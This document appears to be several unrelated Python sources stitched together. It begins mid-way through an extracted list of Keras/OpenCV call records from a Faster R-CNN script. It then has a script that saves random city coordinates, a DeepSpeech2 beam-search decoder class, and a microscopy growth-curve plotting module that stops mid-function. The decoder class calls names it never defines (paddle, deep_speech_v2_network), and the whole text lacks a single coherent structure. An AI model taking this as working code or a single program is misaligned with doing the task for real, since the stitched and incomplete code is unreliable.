'(shape=input_shape_img)\n', (3293, 3316), False, 'from keras.layers import Input\n'), ((3330, 3358), 'keras.layers.Input', 'Input', ([], {'shape': '(C.num_rois, 4)'}), '(shape=(C.num_rois, 4))\n', (3335, 3358), False, 'from keras.layers import Input\n'), ((3380, 3413), 'keras.layers.Input', 'Input', ([], {'shape': 'input_shape_features'}), '(shape=input_shape_features)\n', (3385, 3413), False, 'from keras.layers import Input\n'), ((3501, 3538), 'keras_frcnn.resnet.nn_base', 'nn.nn_base', (['img_input'], {'trainable': '(True)'}), '(img_input, trainable=True)\n', (3511, 3538), True, 'import keras_frcnn.resnet as nn\n'), ((3665, 3699), 'keras_frcnn.resnet.rpn', 'nn.rpn', (['shared_layers', 'num_anchors'], {}), '(shared_layers, num_anchors)\n', (3671, 3699), True, 'import keras_frcnn.resnet as nn\n'), ((3832, 3860), 'keras.models.Model', 'Model', (['img_input', 'rpn_layers'], {}), '(img_input, rpn_layers)\n', (3837, 3860), False, 'from keras.models import Model\n'), ((3886, 3935), 'keras.models.Model', 'Model', (['[feature_map_input, roi_input]', 'classifier'], {}), '([feature_map_input, roi_input], classifier)\n', (3891, 3935), False, 'from keras.models import Model\n'), ((3957, 4006), 'keras.models.Model', 'Model', (['[feature_map_input, roi_input]', 'classifier'], {}), '([feature_map_input, roi_input], classifier)\n', (3962, 4006), False, 'from keras.models import Model\n'), ((2371, 2393), 'operator.itemgetter', 'operator.itemgetter', (['(0)'], {}), '(0)\n', (2390, 2393), False, 'import operator\n'), ((2613, 2630), 'pickle.load', 'pickle.load', (['f_in'], {}), '(f_in)\n', (2624, 2630), False, 'import pickle\n'), ((3075, 3097), 'keras.backend.image_dim_ordering', 
'K.image_dim_ordering', ([], {}), '()\n', (3095, 3097), True, 'from keras import backend as K\n'), ((4565, 4576), 'time.time', 'time.time', ([], {}), '()\n', (4574, 4576), False, 'import time\n'), ((4590, 4622), 'os.path.join', 'os.path.join', (['img_path', 'img_name'], {}), '(img_path, img_name)\n', (4602, 4622), False, 'import os\n'), ((4631, 4651), 'cv2.imread', 'cv2.imread', (['filepath'], {}), '(filepath)\n', (4641, 4651), False, 'import cv2\n'), ((7790, 7851), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(0, 0)', '(width, 30)', '(0, 0, 0)', '(-1)'], {}), '(img_scaled, (0, 0), (width, 30), (0, 0, 0), -1)\n', (7803, 7851), False, 'import cv2\n'), ((1578, 1609), 'os.path.join', 'os.path.join', (['output_path', 'file'], {}), '(output_path, file)\n', (1590, 1609), False, 'import os\n'), ((4902, 4924), 'keras.backend.image_dim_ordering', 'K.image_dim_ordering', ([], {}), '()\n', (4922, 4924), True, 'from keras import backend as K\n'), ((4941, 4970), 'numpy.transpose', 'np.transpose', (['X', '(0, 2, 3, 1)'], {}), '(X, (0, 2, 3, 1))\n', (4953, 4970), True, 'import numpy as np\n'), ((5099, 5121), 'keras.backend.image_dim_ordering', 'K.image_dim_ordering', ([], {}), '()\n', (5119, 5121), True, 'from keras import backend as K\n'), ((5380, 5447), 'numpy.expand_dims', 'np.expand_dims', (['R[C.num_rois * jk:C.num_rois * (jk + 1), :]'], {'axis': '(0)'}), '(R[C.num_rois * jk:C.num_rois * (jk + 1), :], axis=0)\n', (5394, 5447), True, 'import numpy as np\n'), ((6752, 6773), 'numpy.array', 'np.array', (['bboxes[key]'], {}), '(bboxes[key])\n', (6760, 6773), True, 'import numpy as np\n'), ((8004, 8039), 'os.path.join', 'os.path.join', (['output_path', 'img_name'], {}), '(output_path, img_name)\n', (8016, 8039), False, 'import os\n'), ((2985, 3013), 'numpy.random.randint', 'np.random.randint', (['(0)', '(255)', '(3)'], {}), '(0, 255, 3)\n', (3002, 3013), True, 'import numpy as np\n'), ((6218, 6244), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6227, 6244), True, 'import numpy as np\n'), ((6844, 6864), 'numpy.array', 'np.array', (['probs[key]'], {}), '(probs[key])\n', (6852, 6864), True, 'import numpy as np\n'), ((6971, 7040), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(x1, y1)', '(x2, y2)', 'class_to_color[key]', '(2)'], {}), '(img_scaled, (x1, y1), (x2, y2), class_to_color[key], 2)\n', (6984, 7040), False, 'import cv2\n'), ((7211, 7269), 'cv2.getTextSize', 'cv2.getTextSize', (['textLabel', 'cv2.FONT_HERSHEY_COMPLEX', '(1)', '(1)'], {}), '(textLabel, cv2.FONT_HERSHEY_COMPLEX, 1, 1)\n', (7226, 7269), False, 'import cv2\n'), ((7302, 7449), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(textOrg[0] - 5, textOrg[1] + baseLine - 5)', '(textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5)', '(0, 0, 0)', '(2)'], {}), '(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (\n textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (0, 0, 0), 2)\n', (7315, 7449), False, 'import cv2\n'), ((7449, 7608), 'cv2.rectangle', 'cv2.rectangle', (['img_scaled', '(textOrg[0] - 5, textOrg[1] + baseLine - 5)', '(textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5)', '(255, 255, 255)', '(-1)'], {}), '(img_scaled, (textOrg[0] - 5, textOrg[1] + baseLine - 5), (\n textOrg[0] + retval[0] + 5, textOrg[1] - retval[1] - 5), (255, 255, 255\n ), -1)\n', (7462, 7608), False, 'import cv2\n'), ((7603, 7692), 'cv2.putText', 'cv2.putText', (['img_scaled', 'textLabel', 'textOrg', 'cv2.FONT_HERSHEY_DUPLEX', '(1)', '(0, 0, 0)', '(1)'], {}), '(img_scaled, textLabel, textOrg, 
cv2.FONT_HERSHEY_DUPLEX, 1, (0,\n 0, 0), 1)\n', (7614, 7692), False, 'import cv2\n'), ((6055, 6081), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6064, 6081), True, 'import numpy as np\n'), ((6485, 6535), 'keras_frcnn.roi_helpers.apply_regr', 'roi_helpers.apply_regr', (['x', 'y', 'w', 'h', 'tx', 'ty', 'tw', 'th'], {}), '(x, y, w, h, tx, ty, tw, th)\n', (6507, 6535), False, 'from keras_frcnn import roi_helpers\n'), ((6659, 6682), 'numpy.max', 'np.max', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (6665, 6682), True, 'import numpy as np\n'), ((7724, 7735), 'time.time', 'time.time', ([], {}), '()\n', (7733, 7735), False, 'import time\n'), ((1294, 1326), 're.findall', 're.findall', (['"""[^0-9]|[0-9]+"""', 'var'], {}), "('[^0-9]|[0-9]+', var)\n", (1304, 1326), False, 'import re\n'), ((4375, 4407), 're.findall', 're.findall', (['"""[^0-9]|[0-9]+"""', 'var'], {}), "('[^0-9]|[0-9]+', var)\n", (4385, 4407), False, 'import re\n'), ((5643, 5665), 'numpy.zeros', 'np.zeros', (['target_shape'], {}), '(target_shape)\n', (5651, 5665), True, 'import numpy as np\n'), ((5915, 5938), 'numpy.max', 'np.max', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (5921, 5938), True, 'import numpy as np\n'), ((5959, 5985), 'numpy.argmax', 'np.argmax', (['P_cls[0, ii, :]'], {}), '(P_cls[0, ii, :])\n', (5968, 5985), True, 'import numpy as np\n')]
|
import numpy as np # type: ignore
city_num = 20
file_path = "./coordinates/"
output_file = "random_" + str(city_num) + "_cities.csv"
if __name__ == "__main__":
    # samples drawn from a “continuous uniform” distribution over [0, 1)
np_cities = np.random.random((city_num, 2))
np.savetxt(file_path + output_file, np_cities, delimiter=",")
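    # Hedged sanity check: read the file back and confirm the coordinates
    # round-trip with the expected (city_num, 2) shape.
    loaded = np.loadtxt(file_path + output_file, delimiter=",")
    assert loaded.shape == (city_num, 2)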
|
[
"numpy.savetxt",
"numpy.random.random"
] |
[((226, 257), 'numpy.random.random', 'np.random.random', (['(city_num, 2)'], {}), '((city_num, 2))\n', (242, 257), True, 'import numpy as np\n'), ((262, 323), 'numpy.savetxt', 'np.savetxt', (['(file_path + output_file)', 'np_cities'], {'delimiter': '""","""'}), "(file_path + output_file, np_cities, delimiter=',')\n", (272, 323), True, 'import numpy as np\n')]
|
"""Contains DeepSpeech2 model."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import os
import time
import logging
import gzip
import copy
import numpy as np
import inspect
from utils.decoder.swig_wrapper import Scorer
from utils.decoder.swig_wrapper import ctc_greedy_decoder
from utils.decoder.swig_wrapper import ctc_beam_search_decoder_batch
class LM_decoder(object):
def __init__(self, beam_alpha, beam_beta, language_model_path,
vocab_list):
"""Initialize the external scorer.
:param beam_alpha: Parameter associated with language model.
:type beam_alpha: float
:param beam_beta: Parameter associated with word count.
:type beam_beta: float
:param language_model_path: Filepath for language model. If it is
empty, the external scorer will be set to
None, and the decoding method will be pure
beam search without scorer.
:type language_model_path: basestring|None
:param vocab_list: List of tokens in the vocabulary, for decoding.
:type vocab_list: list
"""
if language_model_path != '':
print("begin to initialize the external scorer "
"for decoding")
self._ext_scorer = Scorer(beam_alpha, beam_beta,
language_model_path, vocab_list)
lm_char_based = self._ext_scorer.is_character_based()
lm_max_order = self._ext_scorer.get_max_order()
lm_dict_size = self._ext_scorer.get_dict_size()
print("language model: "
"is_character_based = %d," % lm_char_based +
" max_order = %d," % lm_max_order +
" dict_size = %d" % lm_dict_size)
print("end initializing scorer")
else:
self._ext_scorer = None
print("no language model provided, "
"decoding by pure beam search without scorer.")
def decode_batch_beam_search(self, probs_split, beam_alpha, beam_beta,
beam_size, cutoff_prob, cutoff_top_n,
vocab_list, num_processes):
"""Decode by beam search for a batch of probs matrix input.
        :param probs_split: List of 2-D probability matrices, each consisting
                            of prob vectors for one speech utterance.
        :type probs_split: list of matrix
:param beam_alpha: Parameter associated with language model.
:type beam_alpha: float
:param beam_beta: Parameter associated with word count.
:type beam_beta: float
:param beam_size: Width for Beam search.
:type beam_size: int
:param cutoff_prob: Cutoff probability in pruning,
default 1.0, no pruning.
:type cutoff_prob: float
:param cutoff_top_n: Cutoff number in pruning, only top cutoff_top_n
characters with highest probs in vocabulary will be
used in beam search, default 40.
:type cutoff_top_n: int
:param vocab_list: List of tokens in the vocabulary, for decoding.
:type vocab_list: list
:param num_processes: Number of processes (CPU) for decoder.
:type num_processes: int
:return: List of transcription texts.
:rtype: List of basestring
"""
        if self._ext_scorer is not None:
self._ext_scorer.reset_params(beam_alpha, beam_beta)
# beam search decode
num_processes = min(num_processes, np.shape(probs_split)[0])
beam_search_results = ctc_beam_search_decoder_batch(
probs_split=probs_split,
vocabulary=vocab_list,
beam_size=beam_size,
num_processes=num_processes,
ext_scoring_func=self._ext_scorer,
cutoff_prob=cutoff_prob,
cutoff_top_n=cutoff_top_n)
results = [result[0][1] for result in beam_search_results]
return results
def _adapt_feeding_dict(self, feeding_dict):
"""Adapt feeding dict according to network struct.
To remove impacts from padding part, we add scale_sub_region layer and
sub_seq layer. For sub_seq layer, 'sequence_offset' and
'sequence_length' fields are appended. For each scale_sub_region layer
'convN_index_range' field is appended.
:param feeding_dict: Feeding is a map of field name and tuple index
of the data that reader returns.
:type feeding_dict: dict|list
:return: Adapted feeding dict.
:rtype: dict|list
"""
adapted_feeding_dict = copy.deepcopy(feeding_dict)
if isinstance(feeding_dict, dict):
adapted_feeding_dict["sequence_offset"] = len(adapted_feeding_dict)
adapted_feeding_dict["sequence_length"] = len(adapted_feeding_dict)
for i in xrange(self._num_conv_layers):
adapted_feeding_dict["conv%d_index_range" %i] = \
len(adapted_feeding_dict)
elif isinstance(feeding_dict, list):
adapted_feeding_dict.append("sequence_offset")
adapted_feeding_dict.append("sequence_length")
for i in xrange(self._num_conv_layers):
adapted_feeding_dict.append("conv%d_index_range" % i)
else:
raise ValueError("Type of feeding_dict is %s, not supported." %
type(feeding_dict))
return adapted_feeding_dict
def _adapt_data(self, data):
"""Adapt data according to network struct.
For each convolution layer in the conv_group, to remove impacts from
padding data, we can multiply zero to the padding part of the outputs
of each batch normalization layer. We add a scale_sub_region layer after
each batch normalization layer to reset the padding data.
For rnn layers, to remove impacts from padding data, we can truncate the
        padding part before the output data is fed into the first rnn layer. We use
sub_seq layer to achieve this.
:param data: Data from data_provider.
:type data: list|function
:return: Adapted data.
:rtype: list|function
"""
def adapt_instance(instance):
if len(instance) < 2 or len(instance) > 3:
raise ValueError("Size of instance should be 2 or 3.")
padded_audio = instance[0]
text = instance[1]
# no padding part
if len(instance) == 2:
audio_len = padded_audio.shape[1]
else:
audio_len = instance[2]
adapted_instance = [padded_audio, text]
# Stride size for conv0 is (3, 2)
# Stride size for conv1 to convN is (1, 2)
# Same as the network, hard-coded here
padded_conv0_h = (padded_audio.shape[0] - 1) // 2 + 1
padded_conv0_w = (padded_audio.shape[1] - 1) // 3 + 1
valid_w = (audio_len - 1) // 3 + 1
adapted_instance += [
[0], # sequence offset, always 0
[valid_w], # valid sequence length
# Index ranges for channel, height and width
# Please refer scale_sub_region layer to see details
[1, 32, 1, padded_conv0_h, valid_w + 1, padded_conv0_w]
]
pre_padded_h = padded_conv0_h
for i in xrange(self._num_conv_layers - 1):
padded_h = (pre_padded_h - 1) // 2 + 1
pre_padded_h = padded_h
adapted_instance += [
[1, 32, 1, padded_h, valid_w + 1, padded_conv0_w]
]
return adapted_instance
if isinstance(data, list):
return map(adapt_instance, data)
elif inspect.isgeneratorfunction(data):
def adapted_reader():
for instance in data():
yield map(adapt_instance, instance)
return adapted_reader
else:
raise ValueError("Type of data is %s, not supported." % type(data))
def _create_parameters(self, model_path=None):
"""Load or create model parameters."""
if model_path is None:
self._parameters = paddle.parameters.create(self._loss)
else:
self._parameters = paddle.parameters.Parameters.from_tar(
gzip.open(model_path))
def _create_network(self, vocab_size, num_conv_layers, num_rnn_layers,
rnn_layer_size, use_gru, share_rnn_weights):
"""Create data layers and model network."""
# paddle.data_type.dense_array is used for variable batch input.
# The size 161 * 161 is only an placeholder value and the real shape
# of input batch data will be induced during training.
audio_data = paddle.layer.data(
name="audio_spectrogram",
type=paddle.data_type.dense_array(161 * 161))
text_data = paddle.layer.data(
name="transcript_text",
type=paddle.data_type.integer_value_sequence(vocab_size))
seq_offset_data = paddle.layer.data(
name='sequence_offset',
type=paddle.data_type.integer_value_sequence(1))
seq_len_data = paddle.layer.data(
name='sequence_length',
type=paddle.data_type.integer_value_sequence(1))
index_range_datas = []
for i in xrange(num_rnn_layers):
index_range_datas.append(
paddle.layer.data(
name='conv%d_index_range' % i,
type=paddle.data_type.dense_vector(6)))
self._log_probs, self._loss = deep_speech_v2_network(
audio_data=audio_data,
text_data=text_data,
seq_offset_data=seq_offset_data,
seq_len_data=seq_len_data,
index_range_datas=index_range_datas,
dict_size=vocab_size,
num_conv_layers=num_conv_layers,
num_rnn_layers=num_rnn_layers,
rnn_size=rnn_layer_size,
use_gru=use_gru,
share_rnn_weights=share_rnn_weights)
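# Hedged usage sketch: pure beam-search decoding with no external language model.
# The toy vocabulary and the probability-matrix layout (time steps x vocab+blank,
# rows summing to one) are assumptions for illustration only.
if __name__ == '__main__':
    vocab = ["'", ' '] + [chr(c) for c in range(ord('a'), ord('z') + 1)]
    decoder = LM_decoder(beam_alpha=2.5, beam_beta=0.3,
                         language_model_path='', vocab_list=vocab)
    probs = np.random.uniform(size=(50, len(vocab) + 1))
    probs /= probs.sum(axis=1, keepdims=True)
    print(decoder.decode_batch_beam_search(
        probs_split=[probs], beam_alpha=2.5, beam_beta=0.3, beam_size=20,
        cutoff_prob=1.0, cutoff_top_n=40, vocab_list=vocab, num_processes=1))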
|
[
"copy.deepcopy",
"gzip.open",
"numpy.shape",
"inspect.isgeneratorfunction",
"utils.decoder.swig_wrapper.Scorer",
"utils.decoder.swig_wrapper.ctc_beam_search_decoder_batch"
] |
[((3843, 4070), 'utils.decoder.swig_wrapper.ctc_beam_search_decoder_batch', 'ctc_beam_search_decoder_batch', ([], {'probs_split': 'probs_split', 'vocabulary': 'vocab_list', 'beam_size': 'beam_size', 'num_processes': 'num_processes', 'ext_scoring_func': 'self._ext_scorer', 'cutoff_prob': 'cutoff_prob', 'cutoff_top_n': 'cutoff_top_n'}), '(probs_split=probs_split, vocabulary=\n vocab_list, beam_size=beam_size, num_processes=num_processes,\n ext_scoring_func=self._ext_scorer, cutoff_prob=cutoff_prob,\n cutoff_top_n=cutoff_top_n)\n', (3872, 4070), False, 'from utils.decoder.swig_wrapper import ctc_beam_search_decoder_batch\n'), ((4898, 4925), 'copy.deepcopy', 'copy.deepcopy', (['feeding_dict'], {}), '(feeding_dict)\n', (4911, 4925), False, 'import copy\n'), ((1435, 1497), 'utils.decoder.swig_wrapper.Scorer', 'Scorer', (['beam_alpha', 'beam_beta', 'language_model_path', 'vocab_list'], {}), '(beam_alpha, beam_beta, language_model_path, vocab_list)\n', (1441, 1497), False, 'from utils.decoder.swig_wrapper import Scorer\n'), ((8092, 8125), 'inspect.isgeneratorfunction', 'inspect.isgeneratorfunction', (['data'], {}), '(data)\n', (8119, 8125), False, 'import inspect\n'), ((3787, 3808), 'numpy.shape', 'np.shape', (['probs_split'], {}), '(probs_split)\n', (3795, 3808), True, 'import numpy as np\n'), ((8685, 8706), 'gzip.open', 'gzip.open', (['model_path'], {}), '(model_path)\n', (8694, 8706), False, 'import gzip\n')]
|
import os
import pathlib
import re
import time
import sys
import json
import cv2
import h5py
import math
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.path as mpath
import matplotlib.lines as mlines
import matplotlib.patches as mpatches
import matplotlib as mpl
from scipy.sparse import csr_matrix
from fast_histogram import histogram1d
from datetime import datetime
from importlib import reload
from PyQt5 import QtCore, QtGui, QtWidgets
# from PyQt5.QtMultimedia import QMediaPlayer
# from PyQt5.QtMultimedia import QMediaContent
# from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import QApplication, QMainWindow, QLabel, QSizePolicy, QWidget, QInputDialog, QFileDialog
from PyQt5.QtWidgets import QHBoxLayout, QLabel, QPushButton, QStyle, QVBoxLayout, QWidget, QSlider, QPushButton, QAction
from PyQt5.QtGui import QImage, QPixmap, QIcon
from PyQt5.QtCore import QDir, Qt, QUrl
import tools.imagepl as opl
import tools.fileio as fio
def figPlotGCs(roiDict, organism='Yeast', saveAll=False, savePath=None):
''' Plots growth curves using matplotlib'''
plt.close('all')
pltRange = setPlotRange(organism)
roiID = roiDict['roi']
timePoints = roiDict['timePoints']/pltRange['GCs']['devisor']
rawobjectArea = roiDict['objectArea']
rawfitData = roiDict['fitData']
numObsv = pltRange['GCs']['numObservations']
rngTime = pltRange['GCs']['xRange']
rngArea = pltRange['GCs']['yRange']
rngTdbl = pltRange['Dbl']['xRange']
rngTlag = pltRange['Lag']['xRange']
rngTexp = pltRange['Tex']['xRange']
rngNDub = pltRange['NumDbl']['xRange']
if len(roiDict['roiInfo'])>0 :
roiID = roiDict['roiInfo']['Strain ID']
numObservations = np.sum(rawobjectArea>0, 1) > numObsv
numDbl = rawfitData[:,1]>0
fitIndex = rawfitData[:,0]>0
dataFilter = numObservations * fitIndex * numDbl
fitData = rawfitData[dataFilter, :]
objectArea = rawobjectArea[dataFilter,:].transpose()
fitData[:,3]/=pltRange['Tex']['devisor']
fitData[:,5]/=pltRange['Lag']['devisor']
fitData[:,6]/=pltRange['Dbl']['devisor']
textLbls= ['Growth Curves','Td (hrs)', 'Tlag (hrs)','Texp (hrs)','Num Dbl']
lineColor = np.array([ [0, 0, 0, 0.3],
[0, 0, 1, 1],
[0, 0.7, 0, 1],
[1, 0, 0, 1],
[0.7,0.5, 0, 1]], dtype = 'float')
xLim = np.array([rngTime,
rngTdbl,
rngTlag,
rngTexp,
rngNDub], dtype = 'float64')
wScale = 0.75
numbins = 75
fitCol = [6,6,5,3,1]
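    # fitData column map used below: 1 -> number of doublings, 3 -> Texp, 5 -> Tlag, 6 -> Td
    # (the same columns are rescaled by the devisor entries a few lines above)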
normVirts = np.zeros((5,numbins), dtype='float64')
virts = np.zeros((5,numbins), dtype='float64')
nbins = np.zeros((5,numbins), dtype='float64')
for cnt in range(5):
nbins[cnt,:] = np.linspace(xLim[cnt,0], xLim[cnt,1], num=numbins)
virts[cnt,:] = histogram1d( fitData[:,fitCol[cnt]], 75, xLim[cnt,:], weights = None)
normVirts[cnt,:] = (virts[cnt,:]/np.max(virts[cnt,2:-10]))*wScale
axesPos = np.array([[0.1875, 0.66666667, 0.75, 0.28],
[0.1875, 0.48666667, 0.75, 0.1],
[0.1875, 0.33333333, 0.75, 0.1],
[0.1875, 0.19333333, 0.75, 0.1],
[0.1875, 0.05333333, 0.75, 0.1]], dtype = 'float64')
xLim = np.array([rngTime,
rngTdbl,
rngTlag,
rngTexp,
rngNDub], dtype = 'float64')
yLim = np.array( [rngArea,
[0,1],
[0,1],
[0,1],
[0,1]], dtype = 'float64')
Label_Font = 12
Title_Font = 12
mpl.rcParams['axes.linewidth'] = 2
mpl.rcParams['xtick.major.width'] = 2
mpl.rcParams['ytick.major.width'] = 2
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['font.family'] = 'Arial'
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['axes.titlesize'] = Title_Font
mpl.rcParams['axes.labelsize'] = Label_Font
gcFig = plt.figure(figsize=[4,7.5], dpi=100, facecolor='w')
axs = []
n = 0
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=yLim[n,:]))
axs[0].plot(timePoints, np.log2(objectArea), color=lineColor[n,:], linewidth=0.8)
axs[0].set_xlabel('Time (hrs)', fontsize=Label_Font, fontweight='bold')
axs[0].set_ylabel('log2[Area]', fontsize=Label_Font, fontweight='bold')
axs[0].set_title(roiID, fontsize=Label_Font, fontweight='bold')
for n in range(1,5):
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=yLim[n,:]))
axs[n].plot(nbins[n,:],normVirts[n,:],color=lineColor[n,:])
xPos = 0.7*np.abs(np.diff(xLim[n,:]))+xLim[n,0]
axs[n].text(xPos,0.75, textLbls[n], fontsize = Label_Font,fontweight='bold',color=lineColor[n,:])
if saveAll:
plt.savefig(savePath)
else:
plt.show()
return None
def figExpSummary(expDict, organism='Yeast'):
plt.close('all')
Label_Font = 12
Title_Font = 12
mpl.rcParams['axes.linewidth'] = 2
mpl.rcParams['xtick.major.width'] = 2
mpl.rcParams['ytick.major.width'] = 2
mpl.rcParams['xtick.direction'] = 'in'
mpl.rcParams['ytick.direction'] = 'in'
mpl.rcParams['font.family'] = 'Arial'
mpl.rcParams['font.weight'] = 'bold'
mpl.rcParams['axes.titlesize'] = Title_Font
mpl.rcParams['axes.labelsize'] = Label_Font
plotDict = setPlotRange(organism)
rngGCs = plotDict['GCs']['xRange']
rngTdbl = plotDict['Dbl']['xRange']
rngTlag = plotDict['Lag']['xRange']
rngTexp = plotDict['Tex']['xRange']
rngNDub = plotDict['NumDbl']['xRange']
rngPopNum = plotDict['PopNum']['xRange']
cntrLbl = ['Dbl', 'Lag', 'Tex', 'NumDbl', 'PopNum']
tickList = {}
left = 1.25/6
bottom = 0.4/10
width = 1.2/8
height = 9/10
spacing = 0.05/6
xLim = np.array([rngTdbl,
rngTlag,
rngTexp,
rngNDub,
rngPopNum], dtype = 'float64')
textLbls= ['Td (hrs)', 'Tlag (hrs)','Texp (hrs)','Num Dbl','Pop Cnt']
Path = mpath.Path
commands = {'M': (mpath.Path.MOVETO,),
'L': (mpath.Path.LINETO,),
'Q': (mpath.Path.CURVE3,)*2,
'C': (mpath.Path.CURVE4,)*3,
'Z': (mpath.Path.CLOSEPOLY,)}
numbins = 75
fitCol = [6,5,3,1]
# breakpoint()
devisor = [
plotDict['Dbl']['devisor'],
plotDict['Lag']['devisor'],
plotDict['Tex']['devisor'],
plotDict['NumDbl']['devisor']
]
roiList = [*expDict.keys()]
key1='roiInfo'
key2='Strain ID'
yTickLbl=[]
for roi in expDict.keys():
if len(expDict[roi][key1])>0:
yTickLbl.append(expDict[roi][key1][key2])
else:
yTickLbl.append(roi)
roiList = [x for _, x in sorted( zip(yTickLbl, roiList), key=lambda pair: pair[0])]
roiList.reverse()
yTickLbl.sort()
yTickLbl.reverse()
yTickLbl.insert(0,'')
yTickLbl.append('')
numRoi = len(roiList)
poptot = np.zeros((numRoi+1,2), dtype='int')
wScale = 0.8
pathDict = {}
cntr=0
for key in roiList:
cntr+=1
normVirts = np.zeros((5,numbins), dtype='float64')
virts = np.zeros((5,numbins), dtype='float64')
nbins = np.zeros((5,numbins), dtype='float64')
fitData = expDict[key]['fitData']
poptot[cntr,:] = fitData.shape
pathDict[key]={}
for n in range(4):
nbins[n,:] = np.linspace(xLim[n,0], xLim[n,1], num=numbins)
virts[n,:] = histogram1d( fitData[:,fitCol[n]]/devisor[n], numbins, xLim[n,:], weights = None)
normVirts[n,:] = (virts[n,:]/np.max(virts[n,2:-10]))*wScale
codes, verts = parseVirts(nbins[n,:], normVirts[n,:])
verts[:,1] += cntr-0.5
path = mpath.Path(verts, codes)
pathDict[key][textLbls[n]] = path
pathDict[key]['nbins'] = nbins
pathDict[key]['normVirts'] = normVirts
axesPos = np.zeros((5,4),dtype = 'float')
for n in range(5):
axesPos[n,:] = [left+n*(width+spacing),bottom,width,height]
gcFig = plt.figure(figsize=[7,9], dpi=100, facecolor='w')
axs = []
n = 0
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=[0,numRoi+1], yticks=list(range(numRoi+1)), xticks=xTicks))
axs[n].set_yticklabels(yTickLbl, fontsize=6, fontweight = 'bold')
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
for roi in roiList:
patch = mpatches.PathPatch(pathDict[roi][textLbls[n]], facecolor = [0,0,1,1], edgecolor = None, linewidth = 0 )
axs[n].add_patch(patch)
for n in range(1,4):
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
axs.append(plt.axes(axesPos[n,:], xlim=xLim[n,:], ylim=[0,numRoi+1], yticks=[], xticks=xTicks))
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
for roi in roiList:
patch = mpatches.PathPatch(pathDict[roi][textLbls[n]], facecolor = [0,0,1,1], edgecolor = None, linewidth = 0 )
axs[n].add_patch(patch)
n +=1
xTicks = plotDict[cntrLbl[n]]['xTicks']
xticklabels = [str(value) for value in xTicks]
ypos = np.arange(poptot.shape[0])
xstart = np.zeros((poptot.shape[0],),dtype = 'float')
axs.append(plt.axes(axesPos[n,:], xscale = 'log', xlim=[1,10000], ylim=[0,numRoi+1], yticks=[], xticks=xTicks))
axs[n].hlines(ypos, xstart, poptot[:,0], linewidth = 5, color = [0,0,1,1] )
axs[n].set_yticklabels(yTickLbl, fontsize=6, fontweight = 'bold')
axs[n].set_xticklabels(xticklabels, fontsize=8, fontweight = 'bold', rotation= 45 )
axs[n].set_title(textLbls[n], fontsize=10, fontweight = 'bold' )
plt.show()
return None
def stitchIm( roiLbl, imNum, imageDir, dataDir):
expPath = pathlib.Path(imageDir)
# indexList = [k for k in expPath.glob('*Index_ODELAYData.*')]
    # Generate image file Path by combining the region of interest label with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = expPath / roiFolder / imageFileName
    # Load Region of Interest Data. This HDF5 file should contain the image stitch coordinates
dataPath = pathlib.Path(dataDir)
initPath = list(dataPath.glob('*Index_ODELAYData.hdf5'))
initData = fio.loadData(initPath[0])
background = initData['backgroundImage']
pixSize = initData['pixSize']
magnification = initData['magnification']
anImage = opl.stitchImage(imageFilePath, pixSize, magnification, background)
im = anImage['Bf']
imSize = im.shape
# This data should be recorded from image display to make sure the image is visible.
imageHist = histogram1d(im.ravel(),2**16,[0,2**16],weights = None).astype('float')
# Calculate the cumulative probability ignoring zero values
cumHist = np.cumsum(imageHist)
cumProb = (cumHist-cumHist[0])/(cumHist[2**16-1]-cumHist[0])
    # set low and high values to normalize image contrast.
loval = np.argmax(cumProb>0.00001)
hival = np.argmax(cumProb>=0.9995)
adjIm = np.array((im.astype('float') - loval.astype('float'))/(hival.astype('float') - loval.astype('float'))*254, dtype = 'uint8')
rsIm = cv2.resize(adjIm, (round(imSize[1]/5), round(imSize[0]/5)))
cv2.imshow('Display Image', rsIm)
k = cv2.waitKey(0)
if k == 107 or k == -1:
cv2.destroyWindow('Display Image')
return k
def showImage(roiLbl, imNum, imageDir, dataDir):
# image = odp.stitchImage(imageFileName, pixSize, magnification, background)
expPath = pathlib.Path(imageDir)
    # Generate image file Path by combining the region of interest label with the experiment path
roiFolder = pathlib.Path('./'+ roiLbl)
imageFileName = pathlib.Path('./'+ roiLbl + '_'+ f'{imNum:00d}' + '.mat')
imageFilePath = expPath / roiFolder / imageFileName
    # Load Region of Interest Data. This HDF5 file should contain the image stitch coordinates
dataPath = pathlib.Path(dataDir)
initPath = list(dataPath.glob('*Index_ODELAYData.hdf5'))
initData = fio.loadData(initPath[0])
roiPath = dataPath / 'ODELAY Roi Data' / f'{roiLbl}.hdf5'
roiData = fio.loadData(roiPath)
background = initData['backgroundImage']
# This data should be extracted from the Experiment Index file or stage data file.
pixSize = initData['pixSize']
magnification = initData['magnification']
stInd = f'{imNum-1:03d}'
